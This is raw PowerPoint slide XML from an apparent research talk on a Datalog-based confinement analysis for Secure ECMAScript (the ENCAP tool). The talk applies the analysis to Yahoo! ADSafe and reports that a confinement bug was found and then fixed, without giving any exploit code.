            <a:ext cx="609600" cy="3048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0" y="2514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CONFINED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7162800" y="57720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CONFINED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="44" name="Straight Arrow Connector 43"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="28" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7281236" y="5357125"/>
            <a:ext cx="829531" cy="398"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="accent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962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4888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2746375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Abstraction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1219200"/>
            <a:ext cx="899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Our decision procedure and implementation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 Analysis in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Datalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>(Whaley et. al.)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33278"/>
            <a:ext cx="2286000" cy="1600199"/>
          </a:xfrm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i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" i="1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2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>:var y = {};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>:var x = y;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>:x.f = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Courier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1933278"/>
            <a:ext cx="1981200" cy="1600199"/>
          </a:xfrm>
          <a:prstGeom prst="rect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i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Facts(t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Time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i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Stack(y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>)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Assign(x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,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y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Store(x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,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“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f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>”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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>y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3886200" y="2579147"/>
            <a:ext cx="1447800" cy="497132"/>
            <a:chOff x="3505200" y="2627068"/>
            <a:chExt cx="1447800" cy="497132"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Right Arrow 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3505200" y="2637865"/>
              <a:ext cx="1447800" cy="486335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627068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abstract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1295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904" indent="-283464">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Abstract SES programs as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Datalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> facts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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3685878"/>
            <a:ext cx="853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904" indent="-283464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Abstract the semantics of SES as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Datalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> inference rules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295478"/>
            <a:ext cx="6477000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"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Stack(x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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>)     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>:-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Assign(x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y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Stack(y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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Heap(l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f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m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>:-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Store(x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f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y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Stack(x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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Stack(y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="22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2650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904" indent="-283464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Execution of program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1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 is abstracted by the least-fixed-point of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Facts(t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times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 under the inference rules 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set of Predicates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1366520"/>
          <a:ext cx="7315200" cy="33096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4506"/>
                <a:gridCol w="1877833"/>
                <a:gridCol w="1742661"/>
                <a:gridCol w="1600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Abstracting </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2200" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>terms</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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Abstracting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dirty="0" smtClean="0"/>
                        <a:t>Heaps &amp; Stacks</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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Assign(x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y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Throw(l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Heap(l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m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Stack(x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Load(x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y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Catch(l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Prototype(l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m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FuncType(l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Store(x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y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TP(l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ObjType(l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ArrayType(l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Formal(l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i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FormalRet(l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NotBuiltin(l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Critical(l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Actual(x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i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z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y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Instance(l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Getter(l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m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Setter(l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f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m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Global(x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Annotation(x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, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Times"/>
                          <a:cs typeface="Times"/>
                        </a:rPr>
                        <a:t>y</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"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181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Sufficient to model implicit type conversions, reflection, exceptions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Decision Procedure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>(Oakland’11)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" i="1" dirty="0">
              <a:latin typeface="Times"/>
              <a:cs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5486400"/>
            <a:ext cx="8763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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Soundness Theorem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Procedure returns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CONFINED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1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"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>=&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Confine(t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, critical)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200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032" y="2368163"/>
            <a:ext cx="2135604" cy="38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Trusted code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032" y="3259557"/>
            <a:ext cx="2135604" cy="635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eval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with free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vars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”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test”,“api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”</a:t>
            </a:r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6032" y="4428870"/>
            <a:ext cx="2135604" cy="603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Environment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(Built-ins)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6032" y="3819270"/>
            <a:ext cx="2135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urier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>+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6032" y="2637584"/>
            <a:ext cx="2135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urier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>+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0" y="1831975"/>
            <a:ext cx="2362200" cy="3273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590800" y="3352800"/>
            <a:ext cx="609600" cy="3048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6" name="Alternate Process 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="2666999"/>
            <a:ext cx="2209800" cy="182893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alibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Datalog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 Solver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(least fixed point) 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95600" y="1143000"/>
            <a:ext cx="29718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Inference  Rules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(SES semantics)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4191000" y="2130293"/>
            <a:ext cx="304800" cy="46050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1" name="Decision 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="2906041"/>
            <a:ext cx="2742404" cy="1208759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24600" y="3256261"/>
            <a:ext cx="274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Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Stack(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>“test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>l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en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t> ∧</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Times"/>
              <a:ea typeface="ＭＳ ゴシック"/>
              <a:cs typeface="Times"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:ea typeface="ＭＳ ゴシック"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Critical(l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:ea typeface="ＭＳ ゴシック"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:ea typeface="ＭＳ ゴシック"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="53" name="Straight Arrow Connector 52"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="51" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="7314802" y="2525041"/>
            <a:ext cx="762000" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="accent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5638800" y="3352800"/>
            <a:ext cx="609600" cy="3048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4200" y="1676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CONFINED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7162800" y="48576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CONFINED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57" name="Straight Arrow Connector 56"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="51" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7281236" y="4529366"/>
            <a:ext cx="829531" cy="398"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="accent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962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96200" y="4126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52400" y="1831975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Abstraction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Mediated Access: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686800" cy="4724399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Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A6A6A6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ECMAScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A6A6A6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (SES)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Sandboxing technique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Confinement analysis technique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application: Yahoo! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ADSafe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3962400"/>
            <a:ext cx="8534400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Implementation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We implemented the decision procedure in the form of an automated tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ENCAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-27432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built on top of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Datalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> engine: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bddbddb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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365760" indent="-27432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available online at: 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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>code.google.com/p/es-lab/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Encap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2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Yahoo! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ADSafe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3" name="Picture 12" descr="adsa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0" y="1587867"/>
            <a:ext cx="2768350" cy="222213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3990" y="4419600"/>
            <a:ext cx="533241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lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>Analysis (1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t> attempt)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464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annotated the API implementation (2000 LOC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>desugared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> it to SES and ran ENCAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464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obtained </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOT CONFINED</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="649224" lvl="1" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>culprits: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ADSAFE.go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ADSAFE.lib</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="376092"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Couri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1892667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Sandbox:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>JSLint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Filter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API:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ADSAFE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> object      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>        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0" y="10668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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ADSafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: Mechanism for safely embedding ads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 33" descr="adsafeAtt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73" y="1540134"/>
            <a:ext cx="3981127" cy="282213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32410" y="1066800"/>
            <a:ext cx="381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was an actual exploit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638006" y="4419600"/>
            <a:ext cx="3886994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Analysis (2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t> attempt)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464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fixed this bug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464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ran ENCAP again</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464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obtained </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CONFINED</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" lvl="1" indent="-283464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033197" y="3748603"/>
            <a:ext cx="4907994" cy="1588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958056"/>
            <a:ext cx="9144000" cy="53665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86709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    Security Goal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: No direct access to the DOM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04800" y="3264267"/>
            <a:ext cx="8458200" cy="1002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/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Result: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ADSafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> API safely confines DOM objects under the SES threat model,  assuming the annotations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7" grpId="0"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="3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2362200"/>
            <a:ext cx="6858000" cy="18288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Concluding Remarks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>and Future Directions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2202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459" u="sng" dirty="0" smtClean="0"/>
              <a:t>JavaScript evolution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2811" dirty="0" smtClean="0"/>
              <a:t>Five key security issues with ES3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="649224" lvl="2" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
